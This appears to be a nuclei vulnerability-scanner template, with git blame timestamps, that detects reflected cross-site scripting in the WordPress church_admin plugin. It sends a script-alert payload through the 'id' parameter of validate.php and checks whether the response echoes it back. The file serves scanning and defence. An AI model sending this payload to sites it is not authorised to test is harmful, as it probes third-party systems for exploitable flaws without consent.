nuclei-templates/vulnerabilities/wordpress/wp-church-admin-xss.yaml

30 lines
688 B
YAML
Raw Normal View History

2021-07-13 09:51:26 +00:00
id: wp-church-admin-xss
2021-07-11 06:07:34 +00:00
info:
name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.securityfocus.com/bid/54329/info
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
2021-07-13 09:51:26 +00:00
- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28'{{randstr}}'%29%3C/script%3E"
2021-07-11 06:07:34 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-13 09:51:26 +00:00
- "<script>alert('{{randstr}}')</script>"
2021-07-11 06:07:34 +00:00
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200